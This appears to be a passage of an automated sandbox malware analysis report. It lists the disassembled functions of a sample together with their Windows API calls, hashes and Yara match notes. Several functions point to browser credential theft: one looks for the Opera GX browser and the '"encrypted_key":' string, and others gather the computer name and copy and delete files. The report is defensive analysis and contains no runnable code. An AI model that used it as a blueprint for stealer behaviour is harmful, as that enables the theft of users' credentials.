                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4198075804-0
                                                                                                                                                                                          • Opcode ID: dda96adf8c40e676cbc418a81a77701d4b3b9eb1c06ba778cb2c361e481681dd
                                                                                                                                                                                          • Instruction ID: cae22177c074574f00be9379a22ab056cef87aff12b3c52f038c2d06519490bf
                                                                                                                                                                                          • Opcode Fuzzy Hash: dda96adf8c40e676cbc418a81a77701d4b3b9eb1c06ba778cb2c361e481681dd
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B210576900218ABCF12EF94E8459DE7BB8FF44354F518066FD05A7162D731AA8ACBA0
                                                                                                                                                                                          Function 00032446 Relevance: 4.5, APIs: 3, Instructions: 41fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00034A8D), ref: 00032460
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,00034A8D,00034A8D,00000000,?,?,?,00034A8D), ref: 00032487
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00034A8D), ref: 0003249E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1065093856-0
                                                                                                                                                                                          • Opcode ID: fd5ac8dbf83d5e6967d55a79f6fe830223552c7a5c9075cd154bae3a35d2d5a2
                                                                                                                                                                                          • Instruction ID: 2c3a125c4ac8546b78a5caf24e7e74d9e019180008c94faa2c4d3e7753ec4eea
                                                                                                                                                                                          • Opcode Fuzzy Hash: fd5ac8dbf83d5e6967d55a79f6fe830223552c7a5c9075cd154bae3a35d2d5a2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9EF05471101118BFEF126FA4FC8AEEF379CDF153A4F004150F95596191D7219D8167B1
                                                                                                                                                                                          Function 0003224A Relevance: 4.5, APIs: 3, Instructions: 36COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00033DEA,00000000,?), ref: 0003226C
                                                                                                                                                                                          • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00032287
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0003228E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3183270410-0
                                                                                                                                                                                          • Opcode ID: 5a18163ff84daa1c0e7a288ad914d22b7181030e38036fbb2bed575a7070f889
                                                                                                                                                                                          • Instruction ID: ff71c5cfe437da1011ee00df128a3ec14d31f1cb7cfffe7e2dd25107307981e5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a18163ff84daa1c0e7a288ad914d22b7181030e38036fbb2bed575a7070f889
                                                                                                                                                                                          • Instruction Fuzzy Hash: 62F05475600208ABDB21AB68EC49FEF77BC9B48B14F410096F645D7190DEB4E9C5CB61
                                                                                                                                                                                          Function 6C413060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C413095
                                                                                                                                                                                            • Part of subcall function 6C4135A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C49F688,00001000), ref: 6C4135D5
                                                                                                                                                                                            • Part of subcall function 6C4135A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C4135E0
                                                                                                                                                                                            • Part of subcall function 6C4135A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C4135FD
                                                                                                                                                                                            • Part of subcall function 6C4135A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C41363F
                                                                                                                                                                                            • Part of subcall function 6C4135A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C41369F
                                                                                                                                                                                            • Part of subcall function 6C4135A0: __aulldiv.LIBCMT ref: 6C4136E4
                                                                                                                                                                                          • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C41309F
                                                                                                                                                                                            • Part of subcall function 6C435B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C4356EE,?,00000001), ref: 6C435B85
                                                                                                                                                                                            • Part of subcall function 6C435B50: EnterCriticalSection.KERNEL32(6C49F688,?,?,?,6C4356EE,?,00000001), ref: 6C435B90
                                                                                                                                                                                            • Part of subcall function 6C435B50: LeaveCriticalSection.KERNEL32(6C49F688,?,?,?,6C4356EE,?,00000001), ref: 6C435BD8
                                                                                                                                                                                            • Part of subcall function 6C435B50: GetTickCount64.KERNEL32 ref: 6C435BE4
                                                                                                                                                                                          • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C4130BE
                                                                                                                                                                                            • Part of subcall function 6C4130F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C413127
                                                                                                                                                                                            • Part of subcall function 6C4130F0: __aulldiv.LIBCMT ref: 6C413140
                                                                                                                                                                                            • Part of subcall function 6C44AB2A: __onexit.LIBCMT ref: 6C44AB30
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4291168024-0
                                                                                                                                                                                          • Opcode ID: 7013b533d688bcf94afe5abe57657d731c1210902df1602325dd74fad7c5056c
                                                                                                                                                                                          • Instruction ID: 98e06e233aab916d5101fc138c92c0ed50d448509cce88b46233920868404365
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7013b533d688bcf94afe5abe57657d731c1210902df1602325dd74fad7c5056c
                                                                                                                                                                                          • Instruction Fuzzy Hash: DFF0D622D2579496EA10EF348841AE6B774EF7B118B50571DF88853511FB2065E9C3C1
                                                                                                                                                                                          Function 00030C85 Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00021385), ref: 00030C91
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,00021385), ref: 00030C98
                                                                                                                                                                                          • GetComputerNameA.KERNEL32(00000000,00021385), ref: 00030CAC
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4203777966-0
                                                                                                                                                                                          • Opcode ID: 3d9c27fa146b631bf57b320a44b13599463f3f1ab390f78b8c922ed5a41077a6
                                                                                                                                                                                          • Instruction ID: 9b75266f18f5dea50bbba8c5f7276d8aeec4317e7758686fa95db58eb3cb6090
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d9c27fa146b631bf57b320a44b13599463f3f1ab390f78b8c922ed5a41077a6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3AE08CB1200304ABE7408B9ADC0DF8F76ACDB84716F000125FA05D3290EAB889488B20
                                                                                                                                                                                          Function 0002C95C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Opera GX,00056853,0005684B,?,?,?), ref: 0002C98F
                                                                                                                                                                                            • Part of subcall function 00031DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00031DFD
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00031D92: GetFileAttributesA.KERNEL32(?,?,?,0002DA7F,?,?,?), ref: 00031D99
                                                                                                                                                                                            • Part of subcall function 0002819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0002CC90,?,?), ref: 000281E5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                                                                                                                          • String ID: Opera GX
                                                                                                                                                                                          • API String ID: 1719890681-3280151751
                                                                                                                                                                                          • Opcode ID: f565226b3c8f3a09302b78053de903bafa93ef037bc13de671eb6166d7b21985
                                                                                                                                                                                          • Instruction ID: 445be7ef58d0ae144bbe346d6d03baa9ada610a4f0840f9e5dc76f787d9c5c9f
                                                                                                                                                                                          • Opcode Fuzzy Hash: f565226b3c8f3a09302b78053de903bafa93ef037bc13de671eb6166d7b21985
                                                                                                                                                                                          • Instruction Fuzzy Hash: 96B1B63290152DABDF12FBA4ED43ADE7778AF14304F910121FD0477167DB20AE5A8BA1
                                                                                                                                                                                          Function 00027B0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00027C56,?), ref: 00027B8A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 544645111-3916222277
                                                                                                                                                                                          • Opcode ID: da079d9b7e2f34499e4dc7347b978d7afa7ec78c5e25182dc363be9297769aaf
                                                                                                                                                                                          • Instruction ID: e44da8bccd36187c849f9be0bc583f1ab9a35f723afbf88d0a2dee4422d8cbfd
                                                                                                                                                                                          • Opcode Fuzzy Hash: da079d9b7e2f34499e4dc7347b978d7afa7ec78c5e25182dc363be9297769aaf
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F11A072508129EBDB36CFA4E588BA9F7E8FB04384F644454D649D7280D774AE84DB60
                                                                                                                                                                                          Function 00036330 Relevance: 3.1, APIs: 2, Instructions: 101stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00031DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00031DFD
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00036378
                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00036396
                                                                                                                                                                                            • Part of subcall function 00035FD1: wsprintfA.USER32 ref: 00036018
                                                                                                                                                                                            • Part of subcall function 00035FD1: FindFirstFileA.KERNEL32(?,?), ref: 0003602F
                                                                                                                                                                                            • Part of subcall function 00035FD1: StrCmpCA.SHLWAPI(?,00056AB4), ref: 00036050
                                                                                                                                                                                            • Part of subcall function 00035FD1: StrCmpCA.SHLWAPI(?,00056AB8), ref: 0003606A
                                                                                                                                                                                            • Part of subcall function 00035FD1: wsprintfA.USER32 ref: 00036091
                                                                                                                                                                                            • Part of subcall function 00035FD1: StrCmpCA.SHLWAPI(?,00056647), ref: 000360A5
                                                                                                                                                                                            • Part of subcall function 00035FD1: wsprintfA.USER32 ref: 000360C2
                                                                                                                                                                                            • Part of subcall function 00035FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 000360EF
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?), ref: 00036125
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?,00056AD0), ref: 00036137
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?,?), ref: 0003614A
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?,00056AD4), ref: 0003615C
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?,?), ref: 00036170
                                                                                                                                                                                            • Part of subcall function 00035FD1: wsprintfA.USER32 ref: 000360D9
                                                                                                                                                                                            • Part of subcall function 00035FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00036229
                                                                                                                                                                                            • Part of subcall function 00035FD1: DeleteFileA.KERNEL32(?), ref: 0003629D
                                                                                                                                                                                            • Part of subcall function 00035FD1: FindNextFileA.KERNEL32(?,?), ref: 000362FF
                                                                                                                                                                                            • Part of subcall function 00035FD1: FindClose.KERNEL32(?), ref: 00036313
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2104210347-0
                                                                                                                                                                                          • Opcode ID: 5fdd0ad255d14c8b609aaec3c093b3ea3a72acf531f167a183af82d96ed47223
                                                                                                                                                                                          • Instruction ID: 8e383be8770a0173d06d9118cd435cacdbe7755180f408cdccb1dc6371545ac0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fdd0ad255d14c8b609aaec3c093b3ea3a72acf531f167a183af82d96ed47223
                                                                                                                                                                                          • Instruction Fuzzy Hash: FF31857290011DAFDF11FB60EC47EE977BDEB0C300F5504E5BA09A3222EA725A958F61
